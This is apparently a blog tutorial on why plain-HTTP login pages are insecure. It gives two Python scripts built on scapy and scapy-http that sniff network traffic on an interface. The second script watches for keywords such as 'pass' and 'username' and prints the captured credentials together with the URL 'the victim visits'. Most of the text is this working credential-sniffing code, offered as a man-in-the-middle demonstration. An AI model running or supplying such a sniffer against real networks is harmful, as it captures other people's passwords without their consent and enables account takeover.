Clear text site
Nowadays it is quite rare to find http login page, because http is insecure, information sent towards the http site is all clear text, if there is a man in the middle sniffing packets to reveal the username and password is possible.
I have written a class in python to demonstrate this man in the middle sniffing. Doing man in the middle is easier sad than done, you need to find a way to intercept traffic sent from the original host.
The module I am using is scapy and scapy-http. Scapy does not have a http filter and hence cannot get the header and payload in the http, scapy-http has a http filter which can capture the entire http payload.
import scapy.all # packet capture module from scapy_http import http # supplementing scapy module by providing http filter from urllib.parse import unquote # to make url encoded text into string # main class known as sniffing, the class file is k9.py class sniffing: def __init__(self, interface, filter=""): self.sniffs(interface, filter) # filter is optional, default is empty string # filter can be "port 80", "tcp", "udp", "udp", "port 21" etc... # The method that does the packet processing, by printing out packets sniff by scapy. def processing_packets(self, pkt): if pkt.haslayer(http.HTTPRequest): # http request filter if pkt.haslayer(scapy.all.Raw): # Raw data within the http packet which contains user and pwd. print(unquote(str(pkt[scapy.all.Raw]))) # print out the raw packet that has username and password. # The method that calls scapy, this is the actual method that does the work. def sniffs(self, interface, filter): return scapy.all.sniff(iface=interface, store=0, prn=self.processing_packets, filter=filter)
This is the main code that executes the script:
import k9 try: k9.sniffing('en0') except KeyboardInterrupt: print('Exit...')
Below is an improvement of the sniffing class, to only print out if username and password variables are present else do not print, also review the site the username and password is used.
from scapy import all as scapy # packet capture module from scapy_http import http # supplementing scapy module by providing http filter from urllib.parse import unquote # to make url encoded text into string # keywords guessing the variable use for username and password keywords = ['pass', 'password', 'usr', 'username', 'user', 'pwd'] class sniffing(): def __init__(self, interface, filter=""): self.sniffs(interface, filter) def processing_data(self, pkt): if pkt.haslayer(http.HTTPRequest): # look for http request print(pkt[http.HTTPRequest].Host + pkt[http.HTTPRequest].Path) # print the URL, the victim visits if pkt.haslayer(scapy.Raw): # username and password appears in raw field for keyword in keywords: # check if each keyword exists if keyword in str(pkt[scapy.Raw]): # in the raw field print(unquote(str(pkt[scapy.Raw]))) # if exists, print out the content once. break def sniffs(self, interface, filter): return scapy.sniff(iface=interface, store=False, prn=self.processing_data, filter=filter)